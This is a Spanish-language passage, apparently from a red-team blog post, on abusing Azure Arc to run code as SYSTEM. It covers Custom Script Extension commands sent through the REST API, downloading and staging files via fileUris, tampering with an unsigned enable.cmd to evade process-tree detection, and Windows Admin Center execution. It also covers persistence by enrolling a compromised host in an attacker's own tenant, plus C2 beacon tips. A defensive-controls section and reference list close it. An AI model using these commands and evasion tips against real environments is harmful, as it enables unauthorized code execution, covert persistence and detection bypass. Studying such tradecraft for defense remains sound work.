Suponiendo que esté ejecutando en el contexto de una entidad de servicio aprovisionada con el rol de Azure Connected Machine Resource Administrator en una suscripción con la configuración predeterminada, una vez más tendrá que enviar comandos a través de la API REST de Azure. Antes de la ejecución, una advertencia de la ejecución basada en extensiones es que solo se puede implementar una única copia de una extensión en un host en un momento dado, lo que significa que si ya se ha agregado un CSE al host de destino, deberá actualizar la extensión existente, en lugar de crear una nueva extensión. La lista de extensiones instaladas actualmente en un host se puede recuperar de la CLI de az con lo siguiente:

az connectedmachine extension list --machine-name [machine name] --resource-group [rg name]

En este caso, aún no hay extensiones instaladas en este host:

Cliente de Arc sin extensiones asociadas
Fig. 47: cliente de Arc sin extensiones asociadas

Se requieren varios args al crear un CSE, siendo el más importante el protectedSettings arg, ya que contiene un atributo opcional commandToExecut . Este atributo es donde, apropiadamente, se colocan los argumentos de ejecución de comandos. A continuación se puede ver un ejemplo de comando az CLI que puede ejecutarse contra la API REST para crear un CSE que inicie el bloc de notas:

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{},\"protectedSettings\":{\"commandToExecute\":\"[Thing to run.exe]\"}}}"

Ejecutar esto una vez más da como resultado una ejecución en el contexto de NT_AUTHORITY\SYSTEM.

Árbol de procesos asociado a la ejecución mediante CSE
Fig. 48: árbol de procesos asociado a la ejecución mediante CSE

Una vez que se ha creado un CSE, también puede comprobar su estado actual a través de la API REST, utilizando un comando con el siguiente formato:

az rest --method get --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE name from prior step]?api-version=2025-02-19-preview"

Al ejecutarlo, podemos ver que la implementación de CSE permanece en un estado de ejecución hasta que el proceso que lanzó finaliza en el sistema cliente.

Estado de la extensión del cliente de Arc cuando se está ejecutando un CSE
Fig. 49: estado de la extensión del cliente de Arc cuando se está ejecutando un CSE

Es importante tener en cuenta este comportamiento, ya que las extensiones no se pueden detener a la fuerza, ni siquiera intentando eliminar el CSE. Esto significa que si lanza un CSE que genera un proceso de larga duración que no te concede acceso al sistema, y no tiens otro mecanismo (como comandos de ejecución) que le permita matar el proceso, podría bloquearse de más ejecuciones de CSE hasta que la caja se reinicie. Además, si usa un CSE como mecanismo para implementar una baliza C2, se recomienda migrar fuera del proceso de origen para poder limpiar el objeto CSE.

Siguiendo adelante, digamos que queremos hacer algo un poco más avanzado con nuestra ejecución de CSE que simplemente ejecutar el bloc de notas. Existen varias opciones para actualizar nuestro CSE actual, y podemos actualizar in situ o eliminar la extensión CSE y volver a implementar. La actualización in situ es más sencilla, pero depende de que la ejecución anterior de CSE esté en algún tipo de estado completado (por ejemplo, correcto, fallido) antes de la ejecución. Para actualizar un CSE ya existente, simplemente puede modificar y volver a enviar el comando original que pasó a la API REST para crearlo, cambiando el valor del atributo commandToExecute a cualquiera que sea su comando actualizado. Esto tiene el beneficio añadido de mantener la estructura de carpetas de CSE en el sistema cliente entre ejecuciones.

He descubierto que, en algunos casos, el CSE puede quedarse colgado en un estado de creación, incluso cuando el proceso que ha ejecutado ya no se está ejecutando en el sistema cliente. La mejor forma que he encontrado de identificar este estado es comprobando la lista de extensiones en el host afectado, que previsiblemente mostrará el host en un provisioningState de Creación, pero si en realidad un proceso sigue ejecutándose a través del host, también observará un mensaje de estado que muestra que la ejecución está teniendo lugar.

Intentando actualizar un CSE que sigue en estado de creación
Fig. 50: intentando actualizar un CSE que aún está en estado de creación
CSE en estado de creación con el proceso subyacente aún en ejecución, como indica el mensaje de estado instanceView
Figura 51: CSE en estado de creación con el proceso subyacente aún en ejecución, como indica el mensaje de estado de InstanceView
CSE en estado de creación sin un proceso subyacente en ejecución: observe el estado vacío de instanceView
Fig. 52: CSE en estado de creación sin un proceso subyacente en ejecución: observe el estado vacío de instanceView

Si encuentra su CSE en este estado "Creando, pero no ejecutándose", el mejor enfoque es eliminarlo por completo (si está seguro de que el proceso que ejecutó con él ya no se está ejecutando), lo que se puede lograr con lo siguiente comando:

az resource delete --ids "/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE Name]"

Intentar eliminar un CSE cuando el ejecutable subyacente aún se está ejecutando (por ejemplo, una baliza https que se ejecuta como NT_AUTHORITY\SYSTEM que no puede salir debido a los controles de proxy) no hará que el proceso se cierre, ni que el CSE se elimine a sí mismo . En su lugar, puede provocar que la extensión CSE se atasque en un estado de eliminación indefinida, y la única corrección completa que identifiqué fue eliminar el objeto principal de identidad híbrida de Azure, desinstalar el cliente de Arc del sistema gestionado y reinstalar todo. Suena aterrador, pero una vez que lo descubrí, fue como un proceso de cinco minutos para que todo volviera a funcionar.

Otra cosa a tener en cuenta con respecto a la eliminación de CSE: el proceso de eliminación elimina la carpeta C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension del disco del sistema cliente, borrando cualquier archivo que haya cargado o modificado en esa estructura. Además, se tarda de tres a cinco minutos en procesar el comando de eliminación de CSE en Azure; esto es normal.

Una de las cosas interesantes que puede hacer un CSE además de ejecutar comandos es descargar archivos de Internet. Se puede especificar un array de archivos bajo el arg de configuración en el attrib fileUris, que permite descargar archivos a la carpeta C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\[version]\Downloads\[iterator ]. Esta estructura de carpetas persiste hasta que se elimina el CSE dentro de Azure, momento en el que todo lo relacionado con la extensión CSE se elimina del disco. Esto significa que podría crear un script que copiaría los archivos de esta carpeta a otra parte del disco, lo que permitiría un mecanismo para el contrabando de archivos que no dependa de una base de descarga web tradicional. Como estos archivos persisten una vez que se mueven fuera del directorio predeterminado, podrían copiarse y luego ejecutarse con un CSE posterior desde otro lugar del disco, rompiendo una detección estática que depende de la identificación de ejecuciones de la carpeta de descargas de CSE anotada anteriormente.

Cuando se crea una lógica más avanzada como esta, que puede tener éxito o no, también es útil poder recuperar el output que indica si una ejecución tuvo éxito o no. Si bien no podemos recuperar directamente el output de las ejecuciones de CSE, se devuelven códigos de salida, lo que significa que podemos incluir ramificaciones condicionales en nuestro código que finaliza con un código específico basado en el estado actual del programa (por ejemplo, copia de archivo exitosa) . Juntando estas piezas, pongamos en escena una demostración súper artificiosa que haga lo siguiente:

  • Descarga dos archivos a través del parámetro fileUris desde un servidor web llamado notVirus.exe y alsoNotVirus.txt. En este caso, usaré un servidor web local con el nombre de host legitServer. Como esto se gestionará a través de fileUris, no necesitamos codificarlo explícitamente en nuestro script de PowerShell.
  • El script de PowerShell debería copiar los archivos descargados a C:\Windows\Temp
  • Por último, el script sale con un código de salida de 10 en caso de descarga y copia correctas, y de 20 en caso de error

Un sencillo script de PowerShell que logre estas cosas sería algo así:

try
{
    Copy-Item -Path "NotVirus.exe" -Destination "C:\Windows\Temp\NotVirus.exe" -Force -
ErrorAction Stop
    Copy-Item -Path "AlsoNotVirus.txt" -Destination "C:\Windows\Temp\AlsoNotVirus.txt" -
Force -ErrorAction Stop
if ((Test-Path "C:\Windows\Temp\NotVirus.exe") -and (Test-Path
"C:\Windows\Temp\AlsoNotVirus.txt"))
    {
        exit 10
    }
    else
    {
        exit 20
    }
}
catch
{
    exit 20
}

Al formatear esto con todos los escapes necesarios para permitir que este script se pase en un blob JSON a través de la API az REST, obtenemos un comando que se ve así:

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{\"fileUris\":[\"http://legitServer/NotVirus.exe\",\"http://legitServer/AlsoNotVirus.txt\"]},\"protectedSettings\":{\"commandToExecute\":\"powershell.exe -ExecutionPolicy Bypass -Command \\\"try { Copy-Item -Path NotVirus.exe -Destination C:\\\\Windows\\\\Temp\\\\NotVirus.exe -Force -ErrorAction Stop; Copy-Item -Path AlsoNotVirus.txt -Destination C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt -Force -ErrorAction Stop; if ((Test-Path 'C:\\\\Windows\\\\Temp\\\\NotVirus.exe') -and (Test-Path 'C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt')) { exit 10 } else { exit 20 } } catch { exit 20 }\\\"\"}}}"

Ejecutamos lo anterior y, tras esperar un minuto a que se complete la ejecución, podemos comprobar su estado con el comando az connectedmachine extension list. Al ejecutar esto, se muestra que tenemos un código de salida 10 atrás, que indica que la ejecución se ha realizado correctamente. El mensaje de error es un mensaje genérico que indica un código de devolución distinto a cero, lo cual no nos preocupa.

Información de extensión que muestra la salida de CSE con un código de estado de 10, lo que indica la ejecución exitosa de nuestro script
Fig. 53: información de extensión que muestra la salida de CSE con un código de estado de 10, lo que indica la ejecución exitosa de nuestro script

Al comprobar el sistema remoto, también podemos verificar que los archivos se han copiado correctamente.

Archivos copiados a C:\Windows\Temp por CSE
Figura 54: archivos copiados en C:\Windows\Temp por CSE

Como podemos ver, este código comienza a complicarse bastante rápido. Para agilizar aún más las cosas, también sería posible descargar un script de PowerShell añadiéndolo a la matriz fileUris y llamándolo después desde el atributo commandToExecute.

Antes de continuar, déjame compartir una última idea sobre cómo podría aumentar el sigilo de esta técnica cambiando su huella de ejecución. Si recuerda nuestro lanzamiento inicial del proceso a través de CSE, cmd.exe apareció en la parte superior del árbol de ejecución, sin ningún proceso principal visible.

Árbol de procesos de ejecución de CSE
Fig. 55: árbol de procesos de ejecución de CSE

Echar un vistazo a este proceso cmd.exe superior muestra un ID de proceso principal (PID) inexistente de 5068.

PID misterioso de 5068
Figura 56: PID misterioso de 5068

Podemos profundizar un poco más con Process Monitor, mostrando que nuestro misterioso ID de proceso principal (PPID) de 5068 era otra instancia de cmd.exe, que creó nuestro árbol de procesos actual a través de una llamada cmd /c. Este misterioso proceso de cmd lo generó gc_extension_service.exe en el PID 3588 al ejecutar el script enable.cmd.

Output de ProcMon que muestra un árbol de ejecución más completo cuando se ejecuta un CSE
Fig. 57: output de ProcMon que muestra un árbol de ejecución más completo cuando se ejecuta un CSE
Script Enable.cmd que contiene un script cmd que llama a CustomScriptHandler.exe
Fig. 58: script Enable.cmd que contiene un script cmd que llama a CustomScriptHandler.exe

¿Por qué importa todo esto? Bueno, actualmente tenemos un árbol de ejecución bastante estático desde gc_extension_service -> cmd.exe -> cmd.exe -> CustomScriptHandler.exe -> cmd.exe -> [lo que sea que ejecutemos a través de CSE]. Si pudiéramos insertarnos más arriba en esa cadena, podríamos eludir las detecciones centradas en ejecuciones sospechosas que proceden de esa conocida estructura de árbol de procesos. Como este archivo .cmd es solo un script sin firmar que NT_AUTHORITY\SYSTEM ejecuta desde una ubicación conocida como resultado de un evento que controlamos (crear o modificar un CSE), sería posible modificar este script para redirigir el flujo de ejecución estándar directamente llamar a un proceso de nuestra elección. Suponiendo que nuestro único vector de ejecución en el host es a través de Arc, presenta un problema de huevo o gallina, ya que tendríamos que ejecutar a través de un árbol de procesos conocido para modificar este archivo. Sin embargo, realizar modificaciones de texto en un archivo sin firmar tiene un perfil de detectabilidad mucho más bajo en comparación con otras acciones típicas posteriores a la explotación. No entraré en más detalles sobre esta modificación (u otras modificaciones similares que podrían realizarse en otras extensiones), sino solo una idea de algo interesante que podría hacer.

Resultados de modificar el árbol de ejecución del proceso para interrumpir el flujo de proceso esperado
Fig. 59: resultados de modificar el árbol de ejecución del proceso para interrumpir el flujo de proceso esperado

Windows Admin Center (y otras extensiones)

Hasta ahora, nos hemos centrado en los ataques que son posibles utilizando la API REST no interactiva desde el punto de vista de una entidad de servicio sobreaprovisionada configurada con el rol Azure Connected Machine Resource Administrator. Sin embargo, si tenemos una cuenta que tiene acceso a la interfaz gráfica de usuario (GUI) web, el alcance de lo que se puede hacer aumenta sustancialmente. Hay una variedad de extensiones que se pueden enviar a clientes administrados y abrir nuevas vías de ejecución de código, pero cuando estaba investigando dentro de Arc, una de las que más me interesó fue el Centro de administración de Windows (WAC). Arc puede implementar el componente de gestión de back-end del Windows Admin Center, una herramienta de gestión remota independiente lanzada por Microsoft, mediante una extensión de Arc. Que yo sepa, no es posible interactuar directamente con esta extensión a través de la API REST de Azure, pero una variedad de opciones de administración del sistema están expuestas a través de la GUI una vez implementadas en un cliente.

Una vez instalada la extensión WAC (lol) en un sistema gestionado por Arc, se puede acceder a ella directamente a través del portal de Arc navegando por el dispositivo gestionado, suponiendo que tenga asignada la función adecuada (o que pueda asignársela usted mismo).

WAC requiere el rol de inicio de sesión de administrador de Windows Admin Center para conectarse
Fig. 60: WAC requiere el rol de inicio de sesión de administrador de Windows Admin Center para conectarse

Con el acceso adecuado configurado, puede conectarse a la interfaz de gestión y ejecutar código a través de una variedad de mecanismos diferentes, incluida la creación de procesos, la creación o modificación de tareas programadas, la modificación de servicios y la modificación del registro. Evitaré entrar en los detalles de cada uno de ellos, pero analizaré rápidamente la creación de procesos como ejemplo que demuestra algunas de las peculiaridades de la ejecución a través de WAC.

La creación de procesos es probablemente la forma más sencilla de ejecutar código mediante WAC, simplemente ingrese un proceso para comenzar (con argumentos opcionales) y haga clic en ir.

Iniciar el bloc de notas a través de WAC
Fig. 61: iniciar el bloc de notas a través de WAC
Árbol de procesos resultante de la ejecución directa de procesos en WAC
Fig. 62: árbol de procesos resultante de la ejecución directa de procesos en WAC

Curiosamente, esto se ejecuta en el contexto de una cuenta virtual (WAC_[su nombre de usuario de Azure]), pero en un contexto de alta integridad con privilegios de token completos, como se puede ver al canalizar un whoami /priv a un archivo de texto en el disco.

Privilegios de token asignados al ejecutar comandos a través de WAC
Fig. 63: privilegios de token asignados al ejecutar comandos a través de WAC

El proceso en sí surge como hijo de WmiPrvSe.exe, un árbol de procesos familiar para aquellos familiarizados con el movimiento lateral a través de Process.Create. Cuando se ejecuta un comando de esta manera, se crea una carpeta de usuario para la cuenta virtual en el disco, lo que deja aún más IOC que deben limpiarse. ¡Sin embargo, es fácil de usar!

Además de estos vectores de ejecución de código, existen otras características de gestión, como la exploración gráfica de archivos y archivos compartidos, una característica imprescindible para su propio C2 de nivel empresarial.

captura de pantalla de vectores de ejecución de código para Windows > System32
Fig. 64

WAC también tiene un panel de control de máquinas virtuales, que permite la instalación de Hyper-V en el sistema gestionado y, posteriormente, la implementación y gestión de máquinas virtuales.

Configuración de Hyper-V mediante WAC
Fig. 65: configuración de Hyper-V mediante WAC
Implementación y gestión de máquinas virtuales en WAC
Fig. 66: implementación y gestión de máquinas virtuales en WAC

Inicialmente esta característica parecía muy prometedora, pero primero tuve problemas al intentar averiguar cómo implementar un archivo ISO en el host. El explorador de archivos de WAC tiene una funcionalidad de carga integrada, pero lamentablemente tiene un límite bastante bajo en el tamaño de carga. Esto significaba que sería necesario implementar un mecanismo alternativo para obtener una ISO adecuada en el sistema con el fin de construir una VM. Se encontraron problemas posteriores que probablemente también se presentarían en un entorno empresarial con respecto a la virtualización anidada. Dado que muchos sistemas en un entorno empresarial suelen estar virtualizados, Intel VT-x / AMD-V tendría que estar habilitado en el sistema para permitir la virtualización anidada.

Por último, con todas estas características de gestión disponibles, no faltan ataques interesantes que podrías realizar mediante reemplazo de archivos o modificaciones para secuestrar cosas que Arc o WAC están haciendo en segundo plano y así ocultar aún más cualquier acción posterior a la explotación. Recuerde, esta es solo una de las muchas extensiones disponibles para implementar en clientes gestionados por Arc; indudablemente existen vectores de ejecución de código similares en otros que pueden ofrecer más funcionalidades.

Tenga en cuenta que WAC realiza sus propias instalaciones independientes y, por tanto, amplía significativamente la huella en disco y los requisitos de limpieza asociados a un compromiso. Además, las acciones que se ejecutan en el contexto de una cuenta WAC_ darán lugar a acciones adicionales en el disco, como la creación de una carpeta de usuario, aunque no se genera ningún perfil de usuario local para la cuenta. Dicho esto, aunque esto sirve como una vía que abre un puñado de vectores de ejecución de código, puede ser algo que me salte en un servidor de misión crítica.

Bonificación: sin privilegios de administrador

Supongamos que ha recuperado un secreto de la entidad de servicio, pero que ha sido debidamente aprovisionado para permitir únicamente la incorporación de sistemas. Aún puede valer la pena intentar incorporar un sistema que controle para ver si alguna instalación o configuración automatizada que contenga material adicional de credenciales se envía río abajo a su sistema.

Azure Arc como mecanismo de persistencia

Este es un tema del que no había visto muchas menciones hasta el reciente blog de Andy Gill sobre el uso de Arc como mecanismo C2. Arc es genial porque es un producto legítimo de Microsoft y se comunica directamente con endpoints API conocidos dentro de Azure, lo que significa que normalmente pasa desapercibido por los productos de EDR (detección y respuesta de endpoints). Aunque no recomiendo intentar operar a través de Arc, sirve como un interesante mecanismo fuera de banda para la persistencia de reserva dentro de un entorno. Aunque un host esté unido de forma híbrida a un entorno Entra, no es necesario que se conecte a una instancia de Arc alojada en el mismo tenant. Realmente, lo que esto significa es que si tiene un contexto de alta integridad en un host que aún no está administrado a través de Arc, puede implementar su propio cliente Arc y administrarlo a través de su propio tenant de Azure.

Como el blog de Andy hace un gran trabajo al detallar el uso general de Arc para la persistencia, solo añadiré un pequeño punto para la operacionalización cuando el acceso basado en GUI no sea posible (como lo que sería típico al operar a través de un agente C2). Al revisar las reseñas de implementación, el proceso de instalación del cliente de Arc consta en gran medida de dos partes: la instalación del cliente real a través de un instalador MSI y la conexión del cliente instalado a un tenant de Azure a través de argumentos de línea de comandos pasados al Agente de máquina conectada de Arc (C:\ Program Files\AzureConnectedMachineAgent\azcmagent.exe). Ambos pasos de este proceso pueden completarse local o remotamente (utilizando su vía preferida de ejecución de código de movimiento lateral) desde un contexto de línea de comandos no interactivo, usando la sintaxis aproximada de:

1.

msiexec /i C:\path\to\AzureConnectedMachineAgent.msi /l*v C:\path\to\write\installationlog.txt /qn REBOOT=ReallySuppress

2.

"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe" connect --service-principal-id "[Service Principal Application ID]" --service-principal-secret "[Your SP Secret]" --resource-group "[resource group]" --tenant-id "[your tenant ID]" --location "[Azure region you want client to be associated with]" --subscription-id "[your subscription]" --cloud "AzureCloud" --correlation-id "[pretty sure random GUID, can just grab from an actual script deployment]"

Una vez conectado, el sistema aparecerá dentro del módulo de servidor Arc en su tenat de Azure, y podrá usar la CLI de az, la API REST de az o la interfaz gráfica para realizar acciones en él. Ahora que el cliente Arc está conectado a un tenant sobre el que tiene control total, también hay una gama más amplia de opciones disponibles para la ejecución posterior de código que van más allá del alcance de lo que se ha tratado en este blog.

Un punto adicional sobre la implementación de Arc: desafortunadamente, no puede conectarse "por encima" de otra configuración de Arc sin desconectar primero la conexión de Arc existente, una operación que requiere el rol de Azure Connected Machine Resource Administrator. Probablemente podría solucionar esto desinstalando completamente y luego reinstalando el cliente de Arc, pero esa no sería mi primera opción para la ejecución o la persistencia. En realidad, lo que esto significa es que si un sistema ya tiene Arc instalado, debe centrarse en obtener acceso a él a través de la conexión existente, en lugar de intentar establecer una conexión con su propio tenant en él.

Orientación defensiva

Controles preventivos

  • Asegúrese de que las entidades de servicio tengan su acceso restringido adecuadamente para asignarles solo las funciones explícitamente requeridas; básicamente, no conceda a una entidad de servicio de implementación el rol de Azure Connected Machine Resource Administrator
  • De forma predeterminada, Arc asigna permisos a nivel de grupo de recursos, pero las asignaciones de roles privilegiados que afectan a Arc también podrían realizarse en los niveles ascendentes de suscripción y grupo de gestión (si están habilitados en su tenant). Realice reseñas periódicas de acceso para garantizar que las asignaciones de roles con la capacidad de ejecutar código a través de Arc (como se indica en la sección anterior Obtener acceso a Arc) son adecuadas. A continuación puede ver un ejemplo de este acceso en dos directores de servicio:

 

Entidades de servicio con el rol de Azure Connected Machine Resource Administrator asignado en Azure
Fig 67: entidades de servicio con el rol de Azure Connected Machine Resource Administrator asignado en Azure
  • Restrinja al máximo el acceso a los scripts de implementación en las instalaciones. Por ejemplo, si la implementación se realiza a través de GPO, el acceso al recurso compartido de implementación debe restringirse no a todos los equipos del dominio, sino a un grupo de sistemas cuyos miembros se inscribirán en Arc.
  • Las listas de permitidos y las listas de bloqueados de extensiones se pueden implementar localmente en sistemas administrados por Arc directamente a través del ejecutable local azcmagent. Estas pueden configurarse para no permitir extensiones no utilizadas (como el comando de ejecución o CSEs), y debido a su naturaleza local, significa que ni siquiera un administrador global en Azure podría modificarlas directamente. La guía oficial de Microsoft con respecto a esto se puede encontrar aquí.
  • Se pueden implementar políticas de Azure que restrinjan qué extensiones se pueden instalar en los sistemas gestionados por Arc. Esto es funcionalmente similar a una lista de bloqueo implementada localmente a través de la configuración de azcmegent, pero se implementa desde Azure. El principal inconveniente de este enfoque es que un atacante suficientemente privilegiado en Azure podría eliminar o modificar las políticas aplicables, lo que le permitiría ejecutar código en sistemas gestionados por Arc.

Controles de detección (vigilancia)

  • Las configuraciones específicas de monitorización de archivos y árboles de procesos pueden ser menos eficaces para identificar ejecuciones sospechosas a través de Arc si los comandos de ejecución o los CSE se utilizan legítimamente dentro de una empresa. Sin embargo, si no se utilizan, se pueden escribir reglas específicas para identificar aún más la postexplotación a través de Arc. Los dos blogs siguientes contienen una gran cantidad de detalles técnicos sobre la identificación de las instalaciones y ejecuciones de Arc basándose tanto en los indicadores en disco como en las estructuras del árbol de procesos:
            -  https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
            -  https://blog.zsec.uk/azure-arc-c2aas/
  • La monitorización a nivel de suscripción dentro de Azure rastreará todas las ejecuciones mediante el comando de ejecución o extensión en los elementos del registro RunCommand e Install o Update an Azure Arc extension, respectivamente. Tenga en cuenta que Instalar o actualizar una extensión de Azure Arc puede mostrar un estado de Error, ya que a menudo el proceso ejecutado devuelve un código de error distinto de cero. Aunque estos registros no muestran exactamente la ejecución de comandos ni el bloque CSE pasado, sí muestran la hora y el usuario que realizó la operación.
  • Los roles que pueden usarse para ejecutar comandos en sistemas gestionados a través de Arc deben tratarse como sensibles y supervisar los cambios de membresía. Las modificaciones de roles dentro de Azure RBAC se registran en el registro de actividad de Azure en las entradas del registro Create role assignment.
  • La estructura del script de implementación de Arc es bastante estática en todos los canales de implementación oficialmente soportados. Si existen herramientas en un entorno que soporta el escaneo de contenido de archivos, se podría implementar una firma básica para este script con el fin de identificar cualquier instancia de scripts de implementación. Un enfoque similar, aunque ligeramente menos eficaz, sería buscar en los archivos el nombre de script de implementación predeterminado de OnboardingScript.ps1.
  • C:\ProgramData\AzureConnectedMachineAgent\Config\agentconfig.json incluye el ID de tenant al que Arc está conectado actualmente. Las implementaciones no autorizadas de Arc podrían identificarse cruzando este valor en todos los sistemas con Arc instalado contra el ID de tenant de la empresa.
  • Azure Arc comparte muchas características con otras herramientas de monitorización remota y gestión (RMM). Tratar una instalación inesperada de Arc en un sistema como un evento alertable puede ayudar a identificar una implementación no autorizada que se esté utilizando para C2 encubierto.

Investigación previa sobre Azure Arc

Nota: Esta lista no pretende contener una lista exhaustiva de todas las investigaciones relacionadas del uso ofensivo de Arc; más bien, contiene una lista de artículos y charlas que me ayudaron a comprender la plataforma, así como los vectores de ataque disponibles a través de ella.

  • Andy Gill - "LOLCLOUD - Azure Arc - C2aaS": https://blog.zsec.uk/azure-arc-c2aas/
  • Benedikt Strobl – NSIDE Attack Logic – "Azure Arc – Part 1 – Escalation from On-Premises to Cloud": https://www.nsideattacklogic.de/azure-arc-part-1-escalation-from-on-premises-to-cloud/
  • Benedikt Strobl – NSIDE Attack Logic – "Azure Arc – Part 2 – Escalation from Cloud to On-Premises": https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
  • Christian Bortone – "Abusing Azure Arc: From Service Principal Exposed To Reverse Shell" (Conference talk): https://www.youtube.com/watch?v=KtRYn5GA4iU
  • CloudBreach – "Abusing Azure Arc for lateral movement": https://cloudbreach.io/blog/abusing-azure-arc-for-lateral-movement/
  • Karl Fosaaen – NetSPI – "Abusing Azure Hybrid Workers for Privilege Escalation – Part 1": https://www.netspi.com/blog/technical-blog/cloud-pentesting/abusing-azure-hybrid-workers-for-privilege-escalation/
  • Renos Nikolaou – "Abusing Azure Arc for lateral movement": https://medium.com/@r3n_hat/abusing-azure-arc-for-lateral-movement-39a1b56cbf2b
  • Ryan Hausknecht – "Azure Virtual Machine Execution Techniques": https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/
  • Soroganoth – "Azure VM Security: Parte 1: pasar del plano de gestión al plano de datos y al comando de ejecución": https://soroganoth.com/post/research/azure_vm_security/
